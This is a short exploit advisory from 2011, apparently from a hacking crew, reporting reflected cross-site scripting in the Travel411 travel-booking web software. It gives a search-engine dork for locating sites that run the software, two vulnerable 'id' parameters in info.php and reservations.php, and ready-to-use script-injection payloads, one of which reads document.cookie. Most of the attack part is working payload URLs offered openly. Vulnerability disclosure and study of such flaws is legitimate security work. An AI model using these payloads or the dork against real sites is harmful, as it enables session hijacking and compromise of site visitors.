ExploitFixes
Travel411 Cross-site scripting (XSS!) 2011-05-03 22:21:11
Posted by: HaNniBaL KsA

[./rS]
#############################################
# ___ ___
# / /\ / /\
# / /::\ / /:/_
# / /:/\:\ / /:/ /\
# / /:/~/:/ / /:/ /::\
# /__/:/ /:/___ /__/:/ /:/\:\
# \ \:\/:::::/ \ \:\/:/~/:/
# \ \::/~~~~ \ \::/ /:/
# \ \:\ \__\/ /:/
# \ \:\ /__/:/
# \__\/ \__\/
#
#
# r00t-s3cur1ty cr3w (rS)
#
# HaNniBaL KsA - Dr.Silver - MR.DH
#
#############################################
# [email protected]:~# ./rS
#############################################

[#] Title : Travel411 Cross-site scripting (XSS!)
[#] Author: HaNniBaL KsA (HK)
[#] Team : r00t-s3cur1ty cr3w (rS)
[#] E-mail : [email protected] & [email protected]
[#] Home : p0c.cc (Proof Of Concepts | P0C Team)
[#] Twitter : twitter.com/r00t_s3cur1ty
[#] Date : 03-05-2011
[#] Dork : intext:"Powered by Travel411.com"
[#] Vendor: http://www.travel411.com/
[#] Tested on : BackTrack 4 r2 & Fedora 14 & Windows XP sp3

-------------------------------------------------------------------------

[+] Vulnerability:
[~] http://site/path/info.php?id=XSS
[~] http://site/path/reservations.php?id=XSS


[+] Example:
[~] http://site/path/info.php?id="><script>alert(document.cookie);</script>
[~] http://site/path/reservations.php?id="><script>alert(1);</script>

-------------------------------------------------------------------------

[-] Greet'z 2 : SiLvEr.47 (Dr.SiLvEr) ; Mr.DH ; Ejram Hacker ; Sn!pEr.S!Te ; Abo z7z7 ; ViRuS KsA ; MooT Hacker ; NoQRQR ; Dr.KroOoZ ; p0c.cc members ... All In MsN!